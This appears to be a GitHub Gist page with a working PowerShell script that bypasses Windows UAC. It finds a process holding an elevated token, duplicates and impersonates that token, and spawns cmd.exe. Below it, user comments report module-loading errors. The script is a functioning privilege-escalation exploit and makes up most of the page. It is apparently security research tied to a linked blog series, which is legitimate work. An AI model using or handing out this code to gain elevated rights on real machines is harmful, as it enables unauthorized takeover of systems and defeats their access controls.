Last active
February 16, 2024 08:32
-
-
Save tyranid/9ffef5962a642d4a1bb8e4ee7e3bebc5 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Powershell script to bypass UAC on Vista+ assuming | |
| # there exists one elevated process on the same desktop. | |
| # Technical details in: | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
| # You need to Install-Module NtObjectManager for this to run. | |
| Import-Module NtObjectManager | |
| # Function to find the first accessible elevated token. | |
| function Get-ElevatedToken { | |
| Param([switch]$NoFilter) | |
| $token = $null | |
| while ($true) { | |
| Write-Host "Checking for elevated processes" | |
| $token = Use-NtObject($ps = Get-NtProcess) { | |
| foreach($p in $ps) { | |
| try { | |
| $ret = Use-NtObject($token = Get-NtToken -Primary ` | |
| -Process $p -Duplicate ` | |
| -IntegrityLevel Medium) { | |
| if ($token.Elevated) { | |
| Write-Host "Found elevated token in process $p - Pid $($p.ProcessId)" | |
| return $token.Duplicate() | |
| } | |
| } | |
| if ($ret -ne $null) { | |
| return $ret | |
| } | |
| } catch { | |
| } | |
| } | |
| } | |
| if ($token -ne $null) { | |
| break | |
| } | |
| Start-Sleep -Seconds 1 | |
| } | |
| if (!$NoFilter) { | |
| # Filter to remove elevated groups/privileges. | |
| $token = Use-NtObject($token) { | |
| Get-NtFilteredToken $token -Flags LuaToken | |
| } | |
| } | |
| return $token | |
| } | |
| Use-NtObject($lua_token = Get-ElevatedToken) { | |
| Use-NtObject($lua_token.Impersonate()) { | |
| [SandboxAnalysisUtils.Win32Process]::CreateProcessWithLogin("Badger", "Badger", "Badger", | |
| "NetCredentialsOnly", "cmd.exe", "cmd.exe", 0, "WinSta0\Default") | |
| } | |
| } |
got this error
Import-Module : The specified module 'NtObjectManager' was not loaded because no valid module file was found in any
module directory.
At C:\Users\1\Desktop\UI.ps1:19 char:1
- Import-Module NtObjectManager
+ CategoryInfo : ResourceUnavailable: (NtObjectManager:String) [Import-Module], FileNotFoundException + FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand
Same here - I had to install the NtObjectManager using an elevated PowerShell window, which defeats the whole purpose of this script since you can't install PowerShell modules if you're not already an administrator.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
got this error
Import-Module : The specified module 'NtObjectManager' was not loaded because no valid module file was found in any
module directory.
At C:\Users\1\Desktop\UI.ps1:19 char:1